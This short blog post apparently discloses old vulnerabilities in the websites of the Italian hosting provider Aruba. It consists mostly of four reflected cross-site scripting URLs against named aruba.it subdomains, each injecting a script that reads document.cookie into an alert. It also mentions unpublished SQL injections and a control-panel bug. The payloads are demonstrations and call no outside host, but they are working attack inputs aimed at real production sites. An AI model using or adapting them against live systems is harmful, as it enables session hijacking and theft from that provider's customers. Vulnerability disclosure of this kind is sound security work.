Those xss are very old too. There are also several sql injections and the possibility to admin several boxes in a control panel due to a bug (but I cannot and I don't want to add them). Those are *just* xss.
http://www.aruba.it/listino.asp?id=/%22%3E%22%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://hosting.aruba.it/domini/nodata.asp?Msg=%22%3E%3E%3C%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://hosting.aruba.it/?lang=%22%3E%3E%3C%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://keyposition.aruba.it/scegli.asp?kvu=%22%3E%3E%3C%3Cscript%3Ealert(document.cookie);%3C/script%3E
Comments
Post a Comment